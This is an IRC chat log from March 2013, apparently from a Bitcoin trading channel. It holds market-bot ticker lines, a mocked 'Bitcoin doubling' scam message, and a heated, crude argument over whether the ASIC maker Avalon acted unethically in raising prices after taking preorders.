06:08:11 mircea_popescu last post? Mar 21 06:08:14 ya i know Mar 21 06:08:20 these tedtalks are better than the real oness Mar 21 06:08:37 [12:03:25] http://www.youtube.com/watch?v=cKEnXcCKD-U Mar 21 06:08:39 OH THAT GUY Mar 21 06:08:54 mircea_popescu well its burried on the bottom of the faq Mar 21 06:08:58 jcpham: Im thinking it has a large amount of bullshit or it depends on a function of quantum physics _no one_ understands Mar 21 06:09:04 mircea_popescu one must really look for it Mar 21 06:09:20 it's been advertised multiple places on the forum tho Mar 21 06:09:29 ya forums is sheep Mar 21 06:09:32 jcpham: theres been a lot of people who've tried that Mar 21 06:09:42 jcpham: all they end up doing is inventing hyperefficient motors, generators, and other shit like that Mar 21 06:09:47 (and voltage converters) Mar 21 06:09:52 seems like it Mar 21 06:10:05 http://www.youtube.com/watch?v=CK62I-4cuSY&feature=share&list=SP4NL9i-Fu15hhYGB-d0hmSWD1fcIvLvn1 Mar 21 06:10:06 they get like 99+% efficiency and think its overunity Mar 21 06:10:07 i'm really trying to understand the jump from the bullshit charts Mar 21 06:10:17 to the torroids and the motor windings Mar 21 06:10:27 because the two are related Mar 21 06:10:33 I wish all motors, dc converters, and generators were that efficient Mar 21 06:10:34 and the explanation makes no sense to me Mar 21 06:10:54 like, sure, it adds weight and size Mar 21 06:10:55 they keep going back to that freaking chart Mar 21 06:11:07 but imagine if Tesla had access to a 99+% efficient motor Mar 21 06:11:20 it'd double their runtime in their cars Mar 21 06:11:23 im setting up a passthrough http://sfbay.craigslist.org/sfc/cps/3691470276.html Mar 21 06:11:24 this seems very much tied to tesla voodoo Mar 21 06:11:30 no, I mean Tesla Motors Mar 21 06:11:34 not Tesla, Son of God Mar 21 06:11:36 i understood Mar 21 06:11:43 but you understood Mar 21 06:11:44 kakobrekla fact is ref only works if you have traffic Mar 21 06:11:57 i want one of those cars Mar 21 06:11:59 and while some on the forum may stil lhave a little btc left, traffic is a diff matter. Mar 21 06:11:59 Tesla, Son of God, Lord of the Cosmos, Savior of Science, etc etc probably built those in his sleep Mar 21 06:12:18 theymos is here Mar 21 06:12:24 or in 0otc Mar 21 06:12:33 so I wonder how much money SD actually makes every day Mar 21 06:12:39 "For those of you that are aware of the digital currency Bitcoin: There has been discovered an exploit that utilizes a series of computers on an "isolated from the internet" back-network that participates in intercepting the data stream where the bitcoins are circulated/stored. The backnet of PC's run a series of algorithms that have the net effect of doubling the bitcoin amount sent to certain addresses. This happens Mar 21 06:12:39 for BOTH receiver and sender to certain bitcoin rcv address programmed into the algorithm." Mar 21 06:12:41 sounds legit. Mar 21 06:12:59 mircea_popescu: LOL Mar 21 06:13:09 not a passthrough i mean a fan club Mar 21 06:13:11 This is working as of March 19th 2013 and if you wish to double you can simply send any whole amount to bitcoin address: Mar 21 06:13:12 "hi, I cracked sha256, but Im only using it on bitcoin" Mar 21 06:13:17 the whole amoun guy again Mar 21 06:13:34 so Mar 21 06:13:41 where is this place where bitcoins are circlulated/stored? Mar 21 06:13:44 can I go there? Mar 21 06:13:54 yes the backnet Mar 21 06:13:54 I bet its full of robot arms moving piles of bitcoins around Mar 21 06:14:13 Diablo-D3 they bounce of off tits Mar 21 06:14:19 mircea_popescu: I MUST FIND THIS PLACE Mar 21 06:14:26 so you must. Mar 21 06:14:58 it's behing the candy rock mountains. Mar 21 06:14:59 come on, Gandalf, we're going to mount gox! Mar 21 06:15:47 The punk rolled up his big blue eyes Mar 21 06:15:47 And said to the jocker, "Sandy, Mar 21 06:15:47 I've hiked and hiked and wandered too, Mar 21 06:15:47 But I ain't seen any candy. Mar 21 06:15:47 I've hiked and hiked till my feet are sore Mar 21 06:15:47 And I'll be damned if I hike any more Mar 21 06:15:47 To be buggered sore like a hobo's whore Mar 21 06:15:47 In the Big Rock Candy Mountains." Mar 21 06:19:07 [BTCTC] [ASICMINER-PT] 1 @ 0.8999 BTC [-] Mar 21 06:21:23 [MPEX] [S.MPOE] 9871 @ 0.00071031 = 7.0115 BTC [+] Mar 21 06:22:59 http://www.youtube.com/watch?v=zmN1txjVBe0&feature=share&list=UUsFys1ILf8D2g5qLV-uCP8A Mar 21 06:23:09 whats this japanese obsession Mar 21 06:24:08 [\\\] thanks you've turned my world upside down Mar 21 06:24:11 [BTCTC] [ASICMINER-PT] 1 @ 0.8999 BTC [-] Mar 21 06:25:29 https://bitcointalk.org/index.php?topic=155546.0 Mar 21 06:25:33 bitme is gone if anyone was using them Mar 21 06:27:54 ;;ticker Mar 21 06:27:54 BTCUSD ticker | Best bid: 65.50101, Best ask: 65.89890, Bid-ask spread: 0.39789, Last trade: 65.50101, 24 hour volume: 91900.48970900, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.67167 Mar 21 06:28:23 yeah i used them saw the writing on the wall a few weeks ago when their one usd withdraw method, aurumxchange vouchx wouldnt work because they didnt have any reserves with aurum anymore Mar 21 06:29:07 they have ACH withdrawal too Mar 21 06:29:39 yeah thats for people who use banks Mar 21 06:30:53 moar milk https://bitcointalk.org/index.php?topic=155098.msg1650919#msg1650919 Mar 21 06:31:13 mommy...what's a bank? Mar 21 06:32:03 wow thats just insane Mar 21 06:32:26 i used to think usagi was just stupid, but this sounds evil Mar 21 06:32:52 pigeons that issue has been hotly debated since last year Mar 21 06:33:34 "No one knows where the price is going next week or next month but if you have vision, you can predict what is going to happen next. " Mar 21 06:33:54 "You strike me as someone who has the sight. So. Buy a little today, buy a little tomorrow. Mar 21 06:36:57 if usagi from the forum is the person from the youtube video i was watching Mar 21 06:37:06 i can't listen anything that person says Mar 21 06:40:46 [MPEX] [S.MPOE] 4517 @ 0.0007241 = 3.2708 BTC [+] Mar 21 06:44:42 ;;ticker Mar 21 06:44:43 BTCUSD ticker | Best bid: 65.80000, Best ask: 65.89999, Bid-ask spread: 0.09999, Last trade: 65.80000, 24 hour volume: 91806.08215649, 24 hour low: 57.70200, 24 hour high: 66.00000, 24 hour vwap: 62.68307 Mar 21 06:44:51 [MPEX] [S.MPOE] 1812 @ 0.0007241 = 1.3121 BTC [+] Mar 21 06:44:53 getting here Mar 21 06:46:16 ;;rate midnightmagic 1 Means well, tries hard but mostly fails. Also http://trilema.com/2013/in-which-we-aspersor/ Mar 21 06:46:17 Rating entry successful. Your rating of 1 for user midnightmagic has been recorded. Mar 21 06:53:03 that's not going to get you your coffee in canada invitation re extended Mar 21 06:59:36 lol Mar 21 06:59:39 he started it Mar 21 07:00:10 Did I now. Mar 21 07:00:31 [BTCTC] [ASICMINER-PT] 19 @ 0.9 = 17.1 BTC [+] Mar 21 07:00:35 [BTCTC] [ASICMINER-PT] 18 @ 0.9 = 16.2 BTC [+] Mar 21 07:00:37 [BTCTC] [ASICMINER-PT] 6 @ 0.9 = 5.4 BTC [+] Mar 21 07:00:43 Did you quote me again in a paid article this time? Mar 21 07:00:57 they're all free if you don't overindulge Mar 21 07:02:01 What's the refresh rate again? A week? Mar 21 07:02:05 yeh Mar 21 07:02:52 you get 5 free a week, iirc, so you can take solace in the fact that the articles quoting you are free. it's the others that go ten to the penny. Mar 21 07:05:17 Oh did you ask me questions that I never answered? Mar 21 07:05:27 yeah scroll up ? Mar 21 07:05:30 or grep i guess Mar 21 07:06:00 but irrespective, how's the ngzhang integrometer these days ? Mar 21 07:06:33 in level with zouthong Mar 21 07:08:08 Quoting more out of context again. Mar 21 07:08:15 oh jolly. Mar 21 07:08:45 you're gonna end up running for political office i suspect. Mar 21 07:08:58 Indeed. ngzhang's Icarus designs were available to anyone, including open-sourced fpga bitstream, pcb layouts, BOM, and supporting software. Mar 21 07:09:17 this isn't a point of contention. Mar 21 07:09:39 He refused to allow mass-purchase of his designs, and when he took preorders for Avalon, he refused to allow single parties to buy up the entire stock. Mar 21 07:10:01 because his devilish little plan was to get a bunch of people to vouch for him. Mar 21 07:10:27 He reversed designs of BFL and gave the information to the public. This is the evidence on which I based my opinion that he was the most ethical hardware manufacturer. Mar 21 07:10:42 yeah, was. Mar 21 07:10:51 well, so what's your opinion now ? Mar 21 07:10:53 So what's your objection again? Mar 21 07:11:45 I don't really care that he's upped the price. With a machine that pays for itself in less than 5 days (with luck) why would he not? Mar 21 07:12:04 Or is it that when someone else makes money, you have a problem with that? Mar 21 07:12:12 so you still view him as "one of the most ethical businesspeople I’ve seen in a long time" ? Mar 21 07:12:39 wait what did he do unethical? The thing I'm aware of is lying about having shipped when they hadn't Mar 21 07:13:07 hes basically bfling Mar 21 07:13:07 well pigeons, something like this basically : "Avalon took interest-free fiat-denominated loans from silly white westerner peoples, built their rigs, used them to mine a little (as people were reporting dust inside their units upon delivery) and eventually decided to not deliver at all anymore, just keep the miners and mine for themselves." Mar 21 07:13:12 pigeons: Do you mean the fact that they're still not done the B1 shipments? Mar 21 07:13:20 giving dates when he knows they wont be met Mar 21 07:13:31 that's to my eyes major unethical stuff. Mar 21 07:13:43 granted, i don't go by the very superficial approach most people seem to use. Mar 21 07:13:50 mircea_popescu: omg dust inside. where are you getting they mined with them. doesnt seem they did Mar 21 07:13:58 i guess he's never said cunt so he must be very ethical (or just not sufficiently familiar with english) Mar 21 07:14:31 midnightmagic: i mean when avalon said that batch 1 had shipped please pay for batch 2 and 2 weeks later they said ok now we're shipping batch 1 i guess they werent caught at customs like we said Mar 21 07:15:23 heh. Mar 21 07:16:28 seriously, someone reported dust means they mined when the evidence seems to show they didnt Mar 21 07:16:37 [MPEX] [S.MPOE] 17888 @ 0.00071661 = 12.8187 BTC [-] Mar 21 07:16:42 gonna have to have more than that Mar 21 07:16:55 what'd it take ? Mar 21 07:17:13 mircea_popescu: If that is, indeed, what he's done, that sucks. I don't see any evidence for them mining their own hardware (difficulty spiked only on delivery as per users self-reporting,) but then you tend to jump to conclusions a lot (as per your assertion that gmaxwell wanted to steal rich peoples' money, because you didn't grok multisig, for example,) so why let the lack of facts get in the way this time? Mar 21 07:17:25 the appearing/dissapearing mystery miner people kept thinking was asicminer ? Mar 21 07:17:44 your really misinformed on this one mircea_popescu Mar 21 07:17:50 midnightmagic you're misrepresenting the issue by clinging to this sidepoint. Mar 21 07:18:05 how did avalon get their money to start this business ? Mar 21 07:18:09 mircea_popescu: I'm misrepresenting that you often draw conclusions from insufficient evidence? Mar 21 07:18:18 [BTCTC] [ASICMINER-PT] 2 @ 0.8 = 1.6 BTC [-] Mar 21 07:18:21 they went to the forum said give us money and we'll build some asics then they built them Mar 21 07:18:27 right. Mar 21 07:18:36 and once they were built they jacked the price 5x Mar 21 07:18:53 this is the crux of the issue. community gave you teh equity, Mar 21 07:18:54 so? Mar 21 07:18:57 you've built yourself a corp worth money Mar 21 07:19:01 and now you're fucking them over. Mar 21 07:19:04 it's not nice. that is all. Mar 21 07:19:17 After 900 units, a giant and sudden price spike, and the fact they honour trade-ins from previous customers? How shockingly unethical Mar 21 07:19:23 how can mircea_popescu say people should be nice and not raise prices Mar 21 07:19:27 this is a troll Mar 21 07:19:31 hm. Mar 21 07:19:43 i'm seriously the only one of us three seeing an issue here ? Mar 21 07:19:47 yes Mar 21 07:19:55 world fulla surprises. Mar 21 07:20:11 mircea_popescu: Someone's making money, money is king, except when you don't directly benefit. Then you suddenly grow a conscience? Mar 21 07:20:38 mircea_popescu: If they are doing what you're saying, then that is utter bullshit. Total crap, because it's competing with their own customers. Mar 21 07:20:40 midnightmagic you know, you shouldn't let your preconceived notions blind you so. Mar 21 07:22:18 the only equitable way here is for avalon to recognise everyone that paid them for rigs for their equity contribution, and distribute revenue from now on. Mar 21 07:22:36 this "you've financed our corp so here's a complimentary biscuit" doesn't really cut it. Mar 21 07:23:14 they said give us X we give you a prduct Mar 21 07:23:22 and the people who got them are happy Mar 21 07:23:31 pigeons neither those are material objections. Mar 21 07:23:39 wow your in space Mar 21 07:24:04 they claimed they're selling an item, but the item didn't at the time exist. the people "pre ordering" simply made equity contributions. Mar 21 07:24:10 you don't have to agree for this to be the case. Mar 21 07:24:25 mircea_popescu: Actually, it's more ethical to ensure widespread device installation. Mar 21 07:24:42 midnightmagic ethical != what'd be most desirable you know ? Mar 21 07:24:53 sure, for bitcoin widespread mining is the best outcome. Mar 21 07:24:55 mircea_popescu: Ethical is what's we're talking about here isn't it? Mar 21 07:24:59 but ethical is a deductive process. Mar 21 07:25:22 so let's try and follow this logic see where the problems lie. Mar 21 07:25:32 mircea_popescu: are you seriously basing your allegegations of self mining on reports of dust? Mar 21 07:25:45 pigeons yes, but i consider that a sidepoint of little importance Mar 21 07:25:55 that is usagi level insane Mar 21 07:25:59 why ? Mar 21 07:26:16 no wonder you thought enough alike to have his assets in your cdos Mar 21 07:26:23 lol Mar 21 07:26:42 woe upon me for trying to give bitcoi nnoobs chances etc. Mar 21 07:26:50 there is plenty of evidence that each unit shipped and reported delivered corresponded with the estimated hashrate, and on the other hand you calim someone had dust Mar 21 07:26:53 everything has dust Mar 21 07:27:19 no piece of hardware i ever bought as new came with dust in it. Mar 21 07:27:27 wow Mar 21 07:27:32 "everything" may be irrelevant in this discussiong. Mar 21 07:27:36 everything Mar 21 07:27:51 are you taking some sort of microscopic dust approach ? Mar 21 07:28:31 no, go to the factory, take something off the line put it in a box for 2.5 days, then run your finger over it Mar 21 07:28:39 I posit an alternate explanation: they purchased or had available the case metal prior to assembly, sitting in a supply bay somewhere. Mar 21 07:28:59 why did their pre-mining yeild them no coins or increased hashrate Mar 21 07:29:05 midnightmagic well... that may be. Mar 21 07:29:09 Which one is more likely based on hashrate increases post-asicminer claimed hashrate? Mar 21 07:29:13 pigeons again, the mystery miner people thought was asicminer. Mar 21 07:29:27 midnightmagic there was a one thing doingmore than asic at some point. Mar 21 07:29:29 mircea_popescu: Which mystery miner is this you're talking about, anyway? Mar 21 07:29:40 the one friedcat had to say "it's not us" Mar 21 07:29:49 why are they such logistical geniouses that they had their units way ahead of sheculed when it bankrupted everyone else so far ahead of schedule they could pre mine except the hashrate and genratded coins dont show it Mar 21 07:30:17 no wonder people dont tell you who they are every time they turn up some units mircea Mar 21 07:30:24 anyway, this entire pre miningargument is a waste of time. i said "a little", you so far are making a case it's not a lot, maybe it;'s not a lot. Mar 21 07:30:35 proving its not at all will be too hard to be worth it, so can we just leave it aside ? Mar 21 07:31:20 mircea_popescu: Primarily, you have said that the b3 update shows they are unethical. So far you have said "they took preorder money" and "they mined prior to sale" as your claims for this to be so. Anything else? Mar 21 07:31:28 A + B -> C Mar 21 07:31:36 A', therefore B -> C? Mar 21 07:31:40 yeah, if we can get to it, i'd like to explain this pre order money thing, cause it's what's important here. Mar 21 07:31:44 so : Mar 21 07:32:04 Okay go ahead. Also, you don't have my permission to quote anything I've said today. Mar 21 07:32:08 any capital exchange will be for consideration. the nature of this consideration is not the empire of the parties, but a matter of fact. Mar 21 07:32:22 !rules midnightmagic Mar 21 07:32:36 so for instance if you pay a girl five dollars to feel her underwear and she sucks your cock while you do it Mar 21 07:32:42 this was prostitution, not textile appreciation. Mar 21 07:32:51 this was point 1. Mar 21 07:33:37 that's supposed to mean they werent supposed to take money to develop asics then deliver the asics? Mar 21 07:33:37 kakobrekla: Actually, channel rules don't supercede explicitly-defined moral rights under the copyright acts of both Canada and Romania. Mar 21 07:33:47 point 2 : any purchase may only be entertained by a seller of an existant item. nobody can sell what they don't own. Mar 21 07:34:02 midnightmagic you should read that before you join or /part Mar 21 07:34:05 becaue of this, any purported sale of inexistant mining equipment is to be quashed as such. Mar 21 07:34:11 as you join Mar 21 07:34:12 !rules Mar 21 07:34:14 not before Mar 21 07:34:27 you are off the deep end mircea_popescu Mar 21 07:34:32 well or before if you see the web page first. Mar 21 07:34:33 kakobrekla: I am aware that this channel was made a publically-logged channel (but not in the topic) as a top-down directive because you are in the #bitcoin-* namespace. Mar 21 07:34:35 point 3 : any capital transfer with a view of a common enterprise is an equity buy, entitling the payer to a stake in the common enterprise, as agreed Mar 21 07:34:43 and if no such agreement exists, to an equitable stake. Mar 21 07:35:01 midnightmagic cool then you wont have problems with quoting. Mar 21 07:35:13 kakobrekla: I have a problem with the quoting mircea does. It's illegal. Mar 21 07:35:26 kakobrekla: Plain logs I have no problem with. Mar 21 07:35:29 now, this is how things are. this isn't open to debate, it's long established point of law. you're welcome to challenge it, but it can't be challenged by simple personal exceptionalism. Mar 21 07:35:34 you'll have to quote and construct arguments. Mar 21 07:35:57 now, on the basis of this, if you later charge more per item than what you've disbursed to your original equity holders, Mar 21 07:36:00 you owe them on the difference. Mar 21 07:36:51 [HAVELOCK] [SDICE] 21 @ 0.47139999 = 9.8994 BTC [-] Mar 21 07:36:53 kakobrekla: Actually, to be honest, I wish there were complete logs of this channel up somewhere.. Mar 21 07:36:58 why didnt you tell them and they buyers that "give me money and ill build something for you and mail it to you" legally means you get equity in the company too in your made up world when they stated taking orders Mar 21 07:37:03 midnightmagic :p Mar 21 07:37:23 pigeons it's not my made-up world. Mar 21 07:37:44 well why didnt you bring it up when they started Mar 21 07:37:45 actually, if bfl delivering weren't such a moot point, i'd be collecting these rights as we speak and sueingthem into oblivion anyway Mar 21 07:38:02 pigeons i don't recall them asking / me caring at that tiem. Mar 21 07:38:09 why do you care now then Mar 21 07:38:22 pigeons the price increase is the trigger. Mar 21 07:38:33 hypocrite Mar 21 07:38:34 they could have *maybe* weaseled it past if they just kept doing the same thing. Mar 21 07:38:46 mircea_popescu: Are pre-orders for nonexistent hardware illegal in China? Mar 21 07:38:46 what's hypocritical about that ? Mar 21 07:39:06 midnightmagic i have no idea about chinese law. my judgement as to ethics is based on my space, not theirs. Mar 21 07:39:17 i would imagien ethics are universal, but who knows. Mar 21 07:40:23 They don't appear universal. Opinions seems to differ greatly on the topic. Mar 21 07:40:35 hey, i'm strictly the keeper of mine. Mar 21 07:40:40 which is why i even bothered to post. Mar 21 07:41:00 You are speaking of two orthogonal points it seems to me. Mar 21 07:41:09 go on ? Mar 21 07:41:50 You are making comments about suing them into oblivion, while simultaneously ignoring jurisdiction. Mar 21 07:42:01 read closer. sueing discussion was re bfl Mar 21 07:42:05 i have jurisdiction on those. Mar 21 07:42:09 Ah so it is. Mar 21 07:42:15 sadly they have no product, and so... Mar 21 07:44:19 I don't think you wrote those words. Mar 21 07:44:52 which words ?! Mar 21 07:47:45 anyway, the shocker for me in all this is that i thought all this is plain obvious to anyone considering the matter. Mar 21 07:47:51 turns out it's about as unexpected as it gets ? Mar 21 07:47:55 i wonder wtf. Mar 21 07:50:19 It almost seems as though you have misinterpreted your own assertions. Mar 21 07:50:35 that'd be a new one. Mar 21 07:50:37 Since I am no longer confident I am arguing just with you, I'm going to stop now. Mar 21 07:51:13 Tell whoever it is who's giving you those words to explain them better next time. Mar 21 07:53:48 ... Mar 21 07:53:57 [MPEX] [S.MPOE] 5500 @ 0.00072608 = 3.9934 BTC [+] Mar 21 07:53:59 [MPEX] [S.MPOE] 36450 @ 0.00072727 = 26.509 BTC [+] Mar 21 07:54:27 Moving on, if and when there is in fact evidence that ngzhang is acting unethically (I do not view a price increase on its own as unethical) I will be happy to eat my own words. Mar 21 07:55:27 so this is all fine & dandy best you can determine then ?\ Mar 21 07:55:52 Until then, I'm not going to discount his vastly understated Icarus+Lancelot contributions simply because some random guy asserts a bunch of unsubstantiated rumours to troll others into providing information when he could just ask. Mar 21 07:56:12 I am disappointed in the price increase if that's what you're asking. Mar 21 07:56:30 what, an aesthetic rather than ethical consideration ? Mar 21 07:57:22 I wonder if you take my words and argue them with other people... Mar 21 07:57:48 It would provide the underpinnings of an excuse for what you're doing on your blog. Mar 21 07:58:13 you're not quite that important, sorry to burst that bubble. Mar 21 07:58:20 but you've failed to answer. Mar 21 07:58:26 How trite. Mar 21 07:58:29 or are you about to tell me you're metaphisically dissapointed ? Mar 21 07:58:35 cause there just aren't that many categories left. Mar 21 08:01:27 lol, I'm apparently important enough to misquote and reputationally impugn twice as retaliation for not being part of your echo chamber. Mar 21 08:01:40 eh get out, retaliation and whatnot Mar 21 08:02:09 vast conspiracies of evil people whispering me basic law in the ear Mar 21 08:02:12 wth is this, the movies ? Mar 21 08:02:45 Nice deflection. Mar 21 08:03:21 I wouldn't call it aesthetic nor ethical objection to a price increase. Mar 21 08:03:34 what deflection ? yer the one trying (kinda lame-y) to impugn or whatever. Mar 21 08:03:44 yes well, it has to have a source you know ? Mar 21 08:03:54 Just simple disappointment because I was considering at last doing a trade-in of my Icarus but I don't want them to charge me batch #3 prices. Mar 21 08:04:05 if it's not your idea of how things should be and it's not your idea of beauty, and it's not what you expect the gods want then what is it Mar 21 08:04:16 you know midnightmagic , you are currently speaking in prose. Mar 21 08:04:21 there's also verse. Mar 21 08:04:36 these two are all there's available to you. if you're not speaking in verse, then it's prose. necessarily. Mar 21 08:04:59 Count the meter, I guess? Mar 21 08:05:09 yeah. so, stop being such a weasel. Mar 21 08:05:16 it's an ethical issue, you just don't want to face it. Mar 21 08:05:49 *hanbot* hi Mar 21 08:06:00 It's a personal loss of potential future earnings. I would say it's purely internal. Mar 21 08:06:38 (In terms of what disappoints me.) Mar 21 08:06:45 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [+] Mar 21 08:07:09 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [+] Mar 21 08:08:18 I just find your hypocrisy growing by leaps and bounds this last while, and I don't understand what's unravelling you. Mar 21 08:09:21 hum. Mar 21 08:09:44 [MPEX] [S.DICE] 2100 @ 0.00521073 = 10.9425 BTC [-] Mar 21 08:09:45 can you articulate this feeling of yours ? Mar 21 08:10:06 What is your problem anyway? Like if bitcoin is such a source of contention for you, why don't you just shake your head at its stupid inanities (sociopathic community elements included) and move on? Mar 21 08:10:23 [MPEX] [S.MPOE] 9062 @ 0.00072537 = 6.5733 BTC [-] Mar 21 08:10:25 [MPEX] [S.MPOE] 554 @ 0.00072506 = 0.4017 BTC [-] Mar 21 08:10:26 you can ask yourself the same thing, neh ? Mar 21 08:10:49 I'm asking you. Mar 21 08:11:20 why exactly would i do or not do anything because some people are stupid/unethical/whartever ? Mar 21 08:11:25 not really much to me either way. Mar 21 08:11:58 You sure don't act like it's not really much. You get worked up over little things more these days than you used to. Mar 21 08:12:06 i get worked up ? Mar 21 08:12:13 listen, simmer with all the projections kay ? Mar 21 08:12:47 Well, the vitriol you post here and on your blog is quite a vent. Mar 21 08:13:13 Like, what do you care whether evidence should or is or isn't updating my opinion? Mar 21 08:13:33 i don't particularly care. i wanted to know whether it does or it doesn't. Mar 21 08:13:50 can't get too far in life without evaluating people. Mar 21 08:14:24 Yeah but why? If I'm so inconsequential, so vapid that everything I ascribe to you is somehow just a reflection of self, and you're this bulletproof supercock, then why do you want to know? Mar 21 08:15:04 because i want to know everything. Mar 21 08:15:16 Then you do care by your own admission. Mar 21 08:15:41 no. caring is personal. knowledge is impersonal. there's a categorical distinction you're trying to equivocate. Mar 21 08:16:07 The drive to know a specific topic is very personal, especially when it's the personal drives of someone else. Mar 21 08:16:26 not really. i'm merely interacting with you on the grounds of you speaking in this public channel. Mar 21 08:16:30 There is, and will never be, personal gain for you to know what's going on in my head. Mar 21 08:16:36 you made some statements of a third party, they're part of the public record, Mar 21 08:16:49 i wish to know for the future how much faith to place in your similar statements. Mar 21 08:16:56 No they're not. Mar 21 08:17:06 that's your contention, but it doesn't carry much water with me. Mar 21 08:17:19 That's because you're an unabashed lawbreaker. Mar 21 08:17:29 but as long as you talk in the market you're participating to the public discussion. Mar 21 08:18:03 Your poor English is making your diction ambiguous again. Mar 21 08:18:14 lol ok. Mar 21 08:19:04 Well, if you think this is all a one-way sponge going on, I guess we're done. Mar 21 08:19:49 sorry i couldn't care more. Mar 21 08:20:16 Don't worry, it's just because you're a sociopath. I'll care enough for the both of us. Mar 21 08:26:57 [MPEX] [S.DICE] 1000 @ 0.00450321 = 4.5032 BTC [-] Mar 21 08:27:48 [MPEX] [S.DICE] 5000 @ 0.0045032 = 22.516 BTC [-] Mar 21 08:34:48 [MPEX] [S.DICE] 1 @ 0.00559697 BTC [+] Mar 21 08:35:38 o look, we're nearing 50 th/s Mar 21 08:35:59 [MPEX] [S.MPOE] 7650 @ 0.00072506 = 5.5467 BTC [-] Mar 21 08:36:15 ;;bc,stats Mar 21 08:36:17 Current Blocks: 227087 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 720 blocks | Next Difficulty In About: 3 days, 10 hours, 17 minutes, and 8 seconds | Next Difficulty Estimate: 6308385.69152 | Estimated Percent Change: 30.13294 Mar 21 08:40:40 [BTCTC] [ASICMINER-PT] 5 @ 0.9 = 4.5 BTC [+] Mar 21 08:42:31 ;;ticker Mar 21 08:42:31 BTCUSD ticker | Best bid: 64.88600, Best ask: 65.00000, Bid-ask spread: 0.11400, Last trade: 64.88600, 24 hour volume: 90256.56593335, 24 hour low: 57.90100, 24 hour high: 66.00000, 24 hour vwap: 63.17442 Mar 21 08:50:47 [MPEX] [S.MPOE] 4596 @ 0.00072506 = 3.3324 BTC [-] Mar 21 09:09:32 [BTCTC] [S.MPOE-PT] 129 @ 0.000729 = 0.094 BTC [+] Mar 21 09:09:34 [BTCTC] [S.MPOE-PT] 100 @ 0.000733 = 0.0733 BTC [+] Mar 21 09:09:37 [BTCTC] [S.MPOE-PT] 671 @ 0.000734 = 0.4925 BTC [+] Mar 21 09:11:25 [BTCTC] [GSDPT] 140 @ 0.00439 = 0.6146 BTC [+] Mar 21 09:11:51 [HAVELOCK] [HIM] 10 @ 1.998 = 19.98 BTC [+] Mar 21 09:11:52 [HAVELOCK] [HIM] 27 @ 2 = 54 BTC [+] **** BEGIN LOGGING AT Thu Mar 21 10:55:42 2013 Mar 21 10:58:23 [BTCTC] [BASIC-MINING] 1 @ 0.349 BTC [+] Mar 21 11:00:43 I gave a hobo $5.00 today Mar 21 11:00:53 fuck, he probably will use it for drugs Mar 21 11:00:54 :/ Mar 21 11:01:18 Your point is? Mar 21 11:01:34 he said he was gonna buy a burger Mar 21 11:01:53 i watched him as i walked upstairs, didnt go to the a&w closeby Mar 21 11:02:38 Still? Mar 21 11:02:50 he probably lied :/ Mar 21 11:03:02 [HAVELOCK] [HIM] 7 @ 2 = 14 BTC [+] Mar 21 11:03:17 A statement of the obvious. I prefer when they don't talk. Mar 21 11:04:39 next time ask hi mif he accepts bitcoin Mar 21 11:04:50 it's what bitcoin jesus (tm) would do. Mar 21 11:06:46 [BTCTC] [BASIC-MINING] 3 @ 0.349 = 1.047 BTC [+] Mar 21 11:07:25 [BTCTC] [BASIC-MINING] 1 @ 0.3495 BTC [+] Mar 21 11:08:05 http://www.dailymail.co.uk/news/article-2296705/Accept-raid-savings-face-ruin-Cyprus-warned-hopes-Russia-led-rescue-ice.html Mar 21 11:08:15 heh. banking vacation extended till next tue Mar 21 11:08:17 that's 8 days Mar 21 11:12:55 [BTCTC] [GSDPT] 17 @ 0.00438 = 0.0745 BTC [+] Mar 21 11:18:52 http://redhotrussia.com/wp-content/uploads/2013/03/yekaterina-putina.jpg Mar 21 11:19:02 the chick in that pic is putin's younger and rather hawd daughter. Mar 21 11:19:08 supposedly that's her hubby. Mar 21 11:24:37 nurseries are starting to open.. but they only pay $10.25 for the most part Mar 21 11:24:37 bah Mar 21 11:29:54 [BTCTC] [BASIC-MINING] 1 @ 0.34 BTC [-] Mar 21 11:32:06 ;;ticker Mar 21 11:32:07 BTCUSD ticker | Best bid: 66.50001, Best ask: 66.89000, Bid-ask spread: 0.38999, Last trade: 66.50001, 24 hour volume: 91099.23550100, 24 hour low: 58.80000, 24 hour high: 66.89000, 24 hour vwap: 63.56070 Mar 21 11:36:07 [BTCTC] [ASICMINER-PT] 10 @ 0.899 = 8.99 BTC [-] Mar 21 11:38:01 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [-] Mar 21 11:38:03 [BTCTC] [ASICMINER-PT] 2 @ 0.888 = 1.776 BTC [-] Mar 21 11:38:06 [BTCTC] [ASICMINER-PT] 2 @ 0.888 = 1.776 BTC [-] Mar 21 11:38:09 [BTCTC] [ASICMINER-PT] 6 @ 0.899 = 5.394 BTC [+] Mar 21 11:41:48 [BTCTC] [PAJKA.BOND] 1 @ 0.1099 BTC [+] Mar 21 11:42:07 [BTCTC] [PAJKA.BOND] 10 @ 0.109978 = 1.0998 BTC [+] Mar 21 11:42:42 [BTCTC] [PAJKA.BOND] 6 @ 0.109979 = 0.6599 BTC [+] Mar 21 11:45:32 [BTCTC] [SYNERGY] 5 @ 0.01605 = 0.0803 BTC [-] Mar 21 11:55:18 [MPEX] [S.MPOE] 4746 @ 0.00073067 = 3.4678 BTC [+] Mar 21 11:55:50 [BTCTC] [BASIC-MINING] 8 @ 0.3332 = 2.6656 BTC [-] Mar 21 12:02:05 https://bitcointalk.org/index.php?topic=155098.msg1651284#msg1651284 lol win. Mar 21 12:04:40 [MPEX] [S.MPOE] 6550 @ 0.00074208 = 4.8606 BTC [+] Mar 21 12:04:51 http://imgur.com/FrIyqxY Mar 21 12:04:54 awww Mar 21 12:05:33 eee Mar 21 12:15:25 heh Mar 21 12:15:46 I just wrote a script that can calculate your SD earnings if you keep putting your entire money in Mar 21 12:15:51 http://pastebin.com/Sw5vbxre Mar 21 12:16:29 it obviously doesn't have all the possible outcomes Mar 21 12:17:00 but you can add those Mar 21 12:17:41 you have to edit the first two variables too Mar 21 12:18:05 and its rigged that you're doing 1 BTC per bet Mar 21 12:18:49 you'll have to multiply $winnings on line 53 against your bet size Mar 21 12:22:16 so a basic martingale script ? Mar 21 12:22:50 http://pastebin.com/EPi228Ay Mar 21 12:22:59 mircea_popescu: possibly Mar 21 12:23:02 now does bet sizes Mar 21 12:24:26 i think i have bitcoin's funniest inbox. i say so. people more tortured than me show me snippets from their ticket systems such as "hi, how do i transfer this to silkroad?" Mar 21 12:24:32 i lower my head in shame. Mar 21 12:24:44 what. Mar 21 12:24:47 